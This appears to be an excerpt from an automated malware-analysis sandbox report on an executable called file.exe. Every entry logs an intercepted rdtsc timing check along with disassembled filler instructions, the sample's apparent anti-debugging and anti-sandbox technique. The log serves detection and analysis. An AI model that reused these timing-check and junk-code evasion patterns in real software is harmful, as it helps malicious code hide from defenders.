Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55883 second address: D55887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55887 second address: D5588B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5588B second address: D558BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F2B4D4AC9E6h 0x00000013 jmp 00007F2B4D4AC9EDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D558BE second address: D558F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F2B4CC6E2B2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D558F2 second address: D558F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D558F6 second address: D55902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55902 second address: D55908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55908 second address: D5590E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5590E second address: D55912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55FDC second address: D55FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55FEB second address: D55FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56680 second address: D56684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56684 second address: D56688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56688 second address: D56697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F2B4CC6E2A6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56697 second address: D5669B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5C9F1 second address: D5C9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5C9F7 second address: D5CA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2B4D4AC9F7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CA16 second address: D5CA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6853A second address: D68544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2B4D4AC9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68544 second address: D68567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68567 second address: D6859B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F7h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2B4D4AC9F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6859B second address: D685C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B7h 0x00000007 jmp 00007F2B4CC6E2ABh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68284 second address: D68294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E4F4 second address: D6E4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E4FA second address: D6E4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E4FE second address: D6E504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E504 second address: D6E50E instructions: 0x00000000 rdtsc 0x00000002 js 00007F2B4D4AC9F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71EBF second address: D71EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jno 00007F2B4CC6E2B3h 0x0000000d jmp 00007F2B4CC6E2B0h 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F2B4CC6E2A6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88B46 second address: D88B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88B4D second address: D88B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2AAh 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8763E second address: D87642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87642 second address: D87646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87921 second address: D8793A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87B14 second address: D87B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87C43 second address: D87C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87C47 second address: D87C50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87C50 second address: D87C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87DA8 second address: D87DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F2B4CC6E2A6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D888BF second address: D888D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C3C0 second address: D8C3C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C3C4 second address: D8C3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C3D3 second address: D8C3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8C3D8 second address: D8C3DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8EC84 second address: D8EC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9A7D7 second address: D9A7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2B4D4AC9E8h 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9D0E3 second address: D9D104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 jo 00007F2B4CC6E2A6h 0x0000000e pop edi 0x0000000f jno 00007F2B4CC6E2B2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9D104 second address: D9D109 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA9C93 second address: DA9CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4CC6E2B7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB80B second address: DAB811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB811 second address: DAB815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB815 second address: DAB824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB824 second address: DAB82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB99E second address: DAB9AC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB9AC second address: DAB9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB9B2 second address: DAB9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB9B6 second address: DAB9C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F2B4CC6E2A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAB9C9 second address: DAB9F7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2B4D4AC9EDh 0x00000010 jmp 00007F2B4D4AC9F2h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC032A second address: DC034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b jmp 00007F2B4CC6E2B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC034B second address: DC034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC049C second address: DC04C2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2B4CC6E2B9h 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC060F second address: DC0616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0E8F second address: DC0E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC0FC4 second address: DC0FDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F2B4D4AC9EBh 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC1187 second address: DC118B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC2B92 second address: DC2BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F2B4D4AC9F9h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC2BB0 second address: DC2BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC594D second address: DC5954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC5C44 second address: DC5D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F2B4CC6E2A8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov edx, dword ptr [ebp+122D2A3Bh] 0x0000002c push dword ptr [ebp+122D1942h] 0x00000032 mov edx, dword ptr [ebp+122D295Fh] 0x00000038 call 00007F2B4CC6E2A9h 0x0000003d jmp 00007F2B4CC6E2B9h 0x00000042 push eax 0x00000043 jmp 00007F2B4CC6E2B7h 0x00000048 mov eax, dword ptr [esp+04h] 0x0000004c push ebx 0x0000004d jmp 00007F2B4CC6E2B5h 0x00000052 pop ebx 0x00000053 mov eax, dword ptr [eax] 0x00000055 push edx 0x00000056 pushad 0x00000057 jnp 00007F2B4CC6E2A6h 0x0000005d pushad 0x0000005e popad 0x0000005f popad 0x00000060 pop edx 0x00000061 mov dword ptr [esp+04h], eax 0x00000065 jc 00007F2B4CC6E2B8h 0x0000006b push eax 0x0000006c push edx 0x0000006d jne 00007F2B4CC6E2A6h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC5D06 second address: DC5D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC6F88 second address: DC6F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC6F8E second address: DC6F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DC6F92 second address: DC6FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F2B4CC6E2A6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push edx 0x00000011 jp 00007F2B4CC6E2A6h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE39F6 second address: CE39FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE39FC second address: CE3A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3A00 second address: CE3A1B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007F2B4D4AC9F2h 0x00000013 js 00007F2B4D4AC9ECh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0948 second address: 4DE09AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2B4CC6E2AFh 0x00000009 adc ecx, 0878F9FEh 0x0000000f jmp 00007F2B4CC6E2B9h 0x00000014 popfd 0x00000015 mov eax, 112F2E47h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov ah, bl 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007F2B4CC6E2B1h 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov bx, ax 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov dl, 1Dh 0x00000037 push esi 0x00000038 pop edi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE09AC second address: 4DE0A2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2B4D4AC9EBh 0x00000009 add esi, 15108A1Eh 0x0000000f jmp 00007F2B4D4AC9F9h 0x00000014 popfd 0x00000015 mov ah, 07h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esp 0x0000001b pushad 0x0000001c mov ax, 83F5h 0x00000020 mov bx, cx 0x00000023 popad 0x00000024 mov dword ptr [esp], ecx 0x00000027 jmp 00007F2B4D4AC9ECh 0x0000002c xchg eax, esi 0x0000002d jmp 00007F2B4D4AC9F0h 0x00000032 push eax 0x00000033 jmp 00007F2B4D4AC9EBh 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c movsx edx, cx 0x0000003f jmp 00007F2B4D4AC9ECh 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A2A second address: 4DE0A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A30 second address: 4DE0A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A34 second address: 4DE0A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A38 second address: 4DE0A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F2B4D4AC9F2h 0x00000013 push ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A5B second address: 4DE0A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4CC6E2AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0A69 second address: 4DE0A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2B4D4AC9ECh 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dx, 93B0h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0AC2 second address: 4DE0AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0AC6 second address: 4DE0ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0ACC second address: 4DE0AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 mov ax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [ebp-04h], 00000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2B4CC6E2B4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD002C second address: 4DD00A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F2B4D4AC9F1h 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F2B4D4AC9EEh 0x00000013 mov ebp, esp 0x00000015 jmp 00007F2B4D4AC9F0h 0x0000001a sub esp, 2Ch 0x0000001d pushad 0x0000001e push ecx 0x0000001f mov ax, bx 0x00000022 pop edx 0x00000023 call 00007F2B4D4AC9F6h 0x00000028 call 00007F2B4D4AC9F2h 0x0000002d pop eax 0x0000002e pop edi 0x0000002f popad 0x00000030 xchg eax, ebx 0x00000031 pushad 0x00000032 mov edi, eax 0x00000034 mov di, si 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD00A6 second address: 4DD00E0 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 7543h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F2B4CC6E2B8h 0x0000000d popad 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 push ecx 0x00000011 mov ecx, edi 0x00000013 pop edx 0x00000014 mov al, 6Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F2B4CC6E2ADh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD014F second address: 4DD0155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0155 second address: 4DD0159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
